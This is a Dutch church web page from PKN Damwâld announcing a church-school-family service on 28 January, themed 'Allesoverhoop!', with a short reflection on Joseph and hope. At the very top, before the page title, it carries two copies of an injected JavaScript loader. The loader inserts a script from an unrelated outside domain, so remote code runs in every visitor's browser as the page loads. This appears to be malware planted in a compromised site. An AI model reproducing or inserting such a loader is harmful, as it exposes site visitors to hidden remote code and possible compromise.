;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerk-school-gezinsdienst 28 januari om 10.00 uur! - PKN Damwâld

Kerk-school-gezinsdienst 28 januari om 10.00 uur!

Gepubliceerd op: woensdag 17 januari

Op zondag 28 januari is de Kerk-school-gezinsdienst in de sporthal van Campus Damwâld. Deze dienst start om 10.00!

Thema: ‘Allesoverhoop!’

Voorganger: R. Colijn

Met medewerking van: Zondagschool van de Hervormde Gemeente van Dantumawoude, Blits! van PKN  Damwâld en leerkrachten/ leerlingen van de scholen: CBS De Sprankeling en (V)SO de Wingerd.

Collecte bij de uitgang: deel voor Stichting Prins Max en deel voor de onkosten.

Het thema van dit jaar is: ‘Allesoverhoop!’

Dit kun je op twee manieren lezen: ‘alles overhoop!’ of ‘alles over hoop!’

Het leven van Jozef lag nog wel eens overhoop: broers die jaloers zijn, in de put, verkocht naar Egypte en hij belandt zelfs in de gevangenis. Tóch geven deze geschiedenissen uit de Bijbel hoop. Jozef is de persoon van hoop tijdens de hongersnood, als hij onderkoning is. En Jozef lijkt op Jezus, de Zoon van God, de enige Hoop voor zondaren zonder hoop in de wereld.
Is dit herkenbaar? Is ons leven ook wel eens overhoop? Of zelfs een puinhoop? Wij mogen dan ook geloven en weten dat Jezus onze Hoop is en wil zijn! Daarom mogen wij delen ‘alles over hoop!’

In de week voor de dienst gaan de leerkrachten met dit onderwerp en deze verhalen in de verschillende groepen en op de verschillende scholen aan de slag. De kinderen horen de verhalen, zingen de liedjes en maken er werkjes over. Een deel van de werkjes zullen in de diensten weer te zien zijn. De kinderen krijgen op school een (digitaal) boekje. Dit boekje wordt gebruikt in de klas, maar is ook voor u en jullie thuis.

Als afsluiter van deze week op school en thuis zal de Kerk-school-gezinsdienst in de sporthal te Damwâld worden gehouden.

Let op: aanvangstijd is 10.00!